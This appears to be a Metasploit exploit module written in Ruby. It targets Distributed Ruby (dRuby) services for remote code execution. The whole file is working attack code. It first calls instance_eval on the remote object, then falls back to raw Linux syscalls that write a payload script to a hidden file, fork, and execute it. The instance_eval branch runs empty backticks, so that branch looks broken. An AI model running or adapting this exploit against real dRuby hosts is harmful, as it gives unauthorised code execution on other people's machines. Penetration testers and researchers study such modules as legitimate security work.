require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Distributed Ruby Send instance_eval/syscall Code Execution',
'Description'=> %q{
This module exploits remote code execution vulnerabilities in dRuby
},
'Author' => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
'License'=> MSF_LICENSE,
'Version'=> '$Revision: 12161 $',
'References' =>
[
],
'Privileged' => false,
'Payload'=>
{
'DisableNops' => true,
'Compat'=>
{
'PayloadType' => 'cmd',
},
'Space' => 32768,
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets'=> [[ 'Automatic', { }]],
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
], self.class)
end
def exploit
puts payload.encoded
serveruri = datastore['URI']
DRb.start_service
p = DRbObject.new_with_uri(serveruri)
class << p
undef :send
end
begin
print_status('trying to exploit instance_eval')
p.send(:instance_eval,"Kernel.fork { `` }")
rescue SecurityError => e
print_status('instance eval failed, trying to exploit syscall')
filename = "." + Rex::Text.rand_text_alphanumeric(16)
begin
j = p.send(:syscall,20)
i =p.send(:syscall,8,filename,0700)
p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
p.send(:syscall,6,i)
p.send(:syscall,2)
p.send(:syscall,11,filename,0,0)
rescue SecurityError => e
print_status('target is not vulnerable')
rescue => e
i = p.send(:syscall,85,filename,0700)
p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
p.send(:syscall,3,i)
p.send(:syscall,57)
p.send(:syscall,59,filename,0,0)
end
end
print_status("payload executed from file #{filename}") unless filename.nil?
print_status("make sure to remove that file") unless filename.nil?
handler(nil)
end
end